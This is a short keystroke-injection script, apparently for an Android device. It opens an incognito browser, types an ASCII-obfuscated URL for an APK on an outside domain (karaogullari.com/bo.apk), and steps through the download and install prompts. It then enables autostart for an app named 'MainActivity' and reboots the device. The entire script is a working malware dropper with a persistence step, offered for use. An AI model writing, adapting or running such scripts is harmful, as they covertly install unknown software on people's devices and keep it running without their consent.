DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
CTRL SHIFT N
DELAY 700
CTRL l
DELAY 300

REM "karaogullari.com/bo.apk"
ASCII 107 97 114 97 111 103 117 108 108 97 114 105 46 99 111 109 47 98 111 46 97 112 107
DELAY 300
ENTER
DELAY 5000

TAB
DELAY 300
ENTER
DELAY 10000

GUI k
DELAY 700
STRING downloads
DELAY 300
ENTER
DELAY 700

TAB
DELAY 300
ENTER
DELAY 300

TAB
DELAY 300
ENTER
DELAY 300
TAB
DELAY 300
ENTER
DELAY 300

TAB
DELAY 300
ENTER
DELAY 10000

ENTER

GUI k
DELAY 700
STRING settings
DELAY 300
ENTER
DELAY 1000
STRING apps
DELAY 300
ENTER
DELAY 1000
STRING MainActivity
DELAY 300
ENTER
DELAY 1000
STRING autostart
DELAY 300
ENTER
DELAY 300
TOGGLE 1  
DELAY 300
HOME
DELAY 500

REBOOT
